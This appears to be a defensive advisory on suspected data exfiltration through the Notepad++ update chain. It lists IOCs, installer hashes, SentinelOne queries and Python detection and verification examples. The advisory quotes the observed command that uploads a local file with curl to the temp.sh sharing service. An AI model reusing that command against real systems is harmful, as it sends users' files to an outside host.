NotePad++ malicious AutoUpdate
BLUF
Recent security alerts tied to the Notepad++ update process show curl.exe uploading a local file to temp.sh, a temporary file-sharing service, which is data exfiltration. The activity originates from a suspicious AutoUpdater.exe that is spawned by gup.exe, the legitimate Notepad++ updater.
Malicious Activity Details
Command Line Seen: The observed command was curl.exe -F "file=@a.txt" -s https://temp[.]sh/upload. The -F "file=@a.txt" option posts the contents of a.txt as a multipart form field (the @ means "read the file"), -s suppresses all progress output so nothing is shown on screen, and the destination is the upload endpoint of temp.sh. The file name is relative, so a.txt is read from the working directory of the curl.exe process; that directory is worth recovering from the telemetry because it tells you what was staged for exfiltration.
Process Chain: In the reported chain, notepad++.exe spawns its updater component, gup.exe (Generic Updater), which in turn spawns a temporary AutoUpdater.exe from the user's AppData\Local\Temp\ directory to perform the update. The malicious activity originates from this temporary AutoUpdater.exe, which is the process that launches curl.exe.
Affected Versions/Timeframe: The issue was reported in October 2025 and is tentatively associated with version 8.8.4. Earlier versions (for example 8.8.2, July 2025) have also been flagged with generic malware names (Fareit, Azorult, Loki) around the update mechanism, but those flags are usually attributed to the installer lacking a digital signature or to general weaknesses in the update path, not to the curl.exe command described here, and should not be treated as the same incident.
Vulnerabilities: The initial vector has not been confirmed. The working hypothesis is DLL hijacking in the Notepad++ plugin or updater load path: an attacker who can place a DLL where a plugin or the updater searches for one gains code execution inside the Notepad++ process tree, and from there needs nothing more than a living-off-the-land tool such as curl.exe to exfiltrate.
IOCs
· curl.exe -F "file=@a.txt" -s https://temp[.]sh/upload
· temp[.]sh (upload endpoint hxxps://temp[.]sh/upload)
Sample SHA256
· No SHA256 of the malicious AutoUpdater.exe appears to be publicly available at the time of writing
Expected Notepad++ 8.8.8 installer SHA256s (confirm against the hashes published with the official release before relying on this table)
npp.8.8.8.Installer.exe (32-bit/x86)
· a19aa1cd7ecb9ca3f1fd0e118fffd0d673fba404ced8c39c2e210a63b70f9c15
npp.8.8.8.Installer.x64.exe (64-bit)
· 6126620593b4a2f8149e8a71221b6d21d5a7102e3b2e3571d4a0429402517208
npp.8.8.8.Installer.arm64.exe (ARM64)
· e163697b981c317982c2633872259004bb33df6d08f7561dac3832e05ca9e36c
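The hashes above are only useful if they are actually compared against what is on disk. The following is an added example, not code from the original note or from the Notepad++ project: it hashes every .exe in a directory (for instance the Temp directory the updater writes into), compares known installer names against the table, and reports anything else sitting next to them. The expected digests are copied from the table above; the decoy files created by demo_with_constructed_files() are constructed for the example and are not real samples. On Windows the manual equivalent is Get-FileHash -Algorithm SHA256.

```python
"""Added example, not from the original note or the Notepad++ project: verify
Notepad++ 8.8.8 installers found on disk against the expected SHA256s listed
above, and surface anything else that is sitting next to them.  The expected
table is copied from the note; the decoy files in demo_with_constructed_files()
are constructed here and are not real samples."""
import hashlib
import os
import tempfile

# Expected digests from the note above, keyed by official installer file name.
EXPECTED_SHA256 = {
    "npp.8.8.8.Installer.exe": "a19aa1cd7ecb9ca3f1fd0e118fffd0d673fba404ced8c39c2e210a63b70f9c15",
    "npp.8.8.8.Installer.x64.exe": "6126620593b4a2f8149e8a71221b6d21d5a7102e3b2e3571d4a0429402517208",
    "npp.8.8.8.Installer.arm64.exe": "e163697b981c317982c2633872259004bb33df6d08f7561dac3832e05ca9e36c",
}
# Windows file names are case-insensitive, so compare lower-cased.
_EXPECTED_LOWER = {k.lower(): v for k, v in EXPECTED_SHA256.items()}


def sha256_file(path, chunk_size=1 << 20):
    """Stream the file so a large installer never has to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def classify(name, digest):
    """'ok' if name and digest match the table, 'mismatch' if the name is a known
    installer but the digest is not, 'unknown' if the name is not in the table."""
    expected = _EXPECTED_LOWER.get(name.lower())
    if expected is None:
        return "unknown"
    return "ok" if expected == digest.lower() else "mismatch"


def verify_directory(directory):
    """Hash every .exe directly inside directory (e.g. %LOCALAPPDATA%\\Temp, where
    the updater drops the downloaded installer) and return {file name: status}."""
    results = {}
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        if os.path.isfile(path) and name.lower().endswith(".exe"):
            results[name] = classify(name, sha256_file(path))
    return results


def demo_with_constructed_files():
    """Constructed decoys: a fake installer with the right name but wrong bytes,
    and an unexpected AutoUpdater.exe, the file name from the reported chain."""
    d = tempfile.mkdtemp(prefix="npp-check-")
    with open(os.path.join(d, "npp.8.8.8.Installer.x64.exe"), "wb") as f:
        f.write(b"constructed decoy, not the real installer")
    with open(os.path.join(d, "AutoUpdater.exe"), "wb") as f:
        f.write(b"constructed decoy")
    return verify_directory(d)


if __name__ == "__main__":
    for name, status in demo_with_constructed_files().items():
        print(f"{status:8} {name}")
```

A "mismatch" on a known installer name is the interesting result: the file claims to be the official build but its bytes are not, which is exactly what a tampered update would look like. "unknown" is a triage prompt, not a verdict.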
Suggested SentinelOne Reports
These are indicator-style reports. They may be noisy, but each one surfaces a distinct element of the reported activity; tune them against a baseline of normal gup.exe behaviour before turning them into alerts. Field names are illustrative and must be mapped to your tenant's schema before a query is saved (in SentinelOne Deep Visibility, for example, EndpointName is the host name, and process name, parent process and command line are exposed through TgtProcName, SrcProcName and TgtProcCmdLine).
· Detect Outbound Connections to temp.sh
This query targets the primary network IOC: an outbound connection to the domain used for exfiltration. The OR group must be parenthesised: AND binds tighter than OR, so without the parentheses the first two terms match every curl.exe and AutoUpdater.exe event regardless of destination.
sql
(EndpointName = 'curl.exe' OR EndpointName = 'AutoUpdater.exe' OR EndpointName = 'gup.exe')
AND Network.RemoteUrl CONTAINS 'temp.sh'
· Detect curl.exe Being Spawned by Notepad++ Updaters
This query searches for the specific, highly suspicious process creation chain where a curl.exe process is started by gup.exe or AutoUpdater.exe.
sql
EventType = 'Process Creation'
AND ParentProcName IN ('gup.exe', 'AutoUpdater.exe')
AND EndpointName = 'curl.exe'
· Detect curl.exe Uploading Data via Command Line
This query looks for the specific command-line arguments used in the attack, where curl.exe is told to upload a file (-F "file=...") to any suspicious URL.
sql
EventType = 'Process Creation'
AND EndpointName = 'curl.exe'
AND ProcessCmdLine CONTAINS ' -F "file='
AND ProcessCmdLine CONTAINS 'upload'
· Detect AutoUpdater.exe in the Temp Directory
A legitimate gup.exe usually resides in the Notepad++ installation directory. The malicious AutoUpdater.exe is often dropped into the temporary directory (AppData\Local\Temp\).
sql
EventType = 'Process Creation'
AND EndpointName = 'AutoUpdater.exe'
AND ProcessImagePath CONTAINS 'AppData\\Local\\Temp\\'
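Before saving queries like the four above, it is worth checking that the logic does what the description says. The following is an added example, not code from the original note or from SentinelOne: the four reports re-expressed as Python predicates and run over a handful of constructed telemetry records (paths, host names and the benign update URL are made up for the example; the record field names are this example's own and must be mapped to your EDR schema). It also includes the first query as originally written without parentheses, to show why that version fires on unrelated curl.exe activity.

```python
"""Added example, not part of the original note or of SentinelOne: the four
indicator reports expressed as predicates over constructed telemetry records.
Field names (type, proc, parent, cmdline, image_path, remote_url) are this
example's own, not an EDR schema."""
import re

SUSPICIOUS_DOMAIN = "temp.sh"
UPDATER_PROCS = {"gup.exe", "autoupdater.exe"}
NETWORK_PROCS = {"curl.exe", "gup.exe", "autoupdater.exe"}
TEMP_DIR_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)


def refang(ioc):
    """Turn a defanged indicator ('temp[.]sh', 'hxxps://') back into a usable one."""
    return (ioc.replace("[.]", ".")
               .replace("hxxps://", "https://")
               .replace("hxxp://", "http://"))


def naive_temp_sh_connection(ev):
    """The first query as written without parentheses: AND binds tighter than OR,
    so only the gup.exe term is actually constrained by the destination URL."""
    proc = ev["proc"].lower()
    return (proc == "curl.exe"
            or proc == "autoupdater.exe"
            or (proc == "gup.exe" and SUSPICIOUS_DOMAIN in ev.get("remote_url", "").lower()))


def rule_temp_sh_connection(ev):
    """Corrected form: (curl OR AutoUpdater OR gup) AND destination contains temp.sh."""
    return (ev["type"] == "network"
            and ev["proc"].lower() in NETWORK_PROCS
            and SUSPICIOUS_DOMAIN in ev.get("remote_url", "").lower())


def rule_curl_from_updater(ev):
    """curl.exe created by gup.exe or AutoUpdater.exe."""
    return (ev["type"] == "process_create"
            and ev["proc"].lower() == "curl.exe"
            and ev.get("parent", "").lower() in UPDATER_PROCS)


def rule_curl_form_upload(ev):
    """curl.exe told to post a file as a form field to an 'upload' URL."""
    cmd = ev.get("cmdline", "")
    return (ev["type"] == "process_create"
            and ev["proc"].lower() == "curl.exe"
            and ' -F "file=' in cmd
            and "upload" in cmd.lower())


def rule_autoupdater_in_temp(ev):
    """AutoUpdater.exe executing out of AppData\\Local\\Temp."""
    return (ev["type"] == "process_create"
            and ev["proc"].lower() == "autoupdater.exe"
            and bool(TEMP_DIR_RE.search(ev.get("image_path", ""))))


RULES = {
    "temp_sh_connection": rule_temp_sh_connection,
    "curl_from_updater": rule_curl_from_updater,
    "curl_form_upload": rule_curl_form_upload,
    "autoupdater_in_temp": rule_autoupdater_in_temp,
}


def evaluate(events):
    """Return {event id: [matched rule names]} for events that hit at least one rule."""
    hits = {}
    for ev in events:
        matched = [name for name, rule in RULES.items() if rule(ev)]
        if matched:
            hits[ev["id"]] = matched
    return hits


# Constructed telemetry: one benign update chain, the reported malicious chain,
# and an unrelated curl.exe invocation that the unparenthesised query would catch.
SAMPLE_EVENTS = [
    {"id": 1, "type": "process_create", "proc": "gup.exe", "parent": "notepad++.exe",
     "image_path": r"C:\Program Files\Notepad++\updater\gup.exe", "cmdline": "gup.exe -v8.8.4"},
    {"id": 2, "type": "process_create", "proc": "AutoUpdater.exe", "parent": "gup.exe",
     "image_path": r"C:\Users\alice\AppData\Local\Temp\AutoUpdater.exe", "cmdline": "AutoUpdater.exe"},
    {"id": 3, "type": "process_create", "proc": "curl.exe", "parent": "AutoUpdater.exe",
     "image_path": r"C:\Windows\System32\curl.exe",
     "cmdline": 'curl.exe -F "file=@a.txt" -s ' + refang("hxxps://temp[.]sh/upload")},
    {"id": 4, "type": "network", "proc": "curl.exe", "remote_url": "https://temp.sh/upload"},
    {"id": 5, "type": "process_create", "proc": "curl.exe", "parent": "cmd.exe",
     "image_path": r"C:\Windows\System32\curl.exe", "cmdline": "curl.exe -sL https://example.com/"},
    {"id": 6, "type": "network", "proc": "gup.exe", "remote_url": "https://notepad-plus-plus.org/"},
]

if __name__ == "__main__":
    for ev_id, names in evaluate(SAMPLE_EVENTS).items():
        print(ev_id, names)
```

Events 1 and 6 (the benign update chain) produce no hits, events 2 to 4 each hit the rule written for them, and event 5 hits nothing with the corrected logic but is a hit for naive_temp_sh_connection, which is the false positive the missing parentheses would generate in production.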
References
Notepad++ Community forum
· hxxps://community.notepad-plus-plus.org/topic/27212/autoupdater-and-connection-temp-sh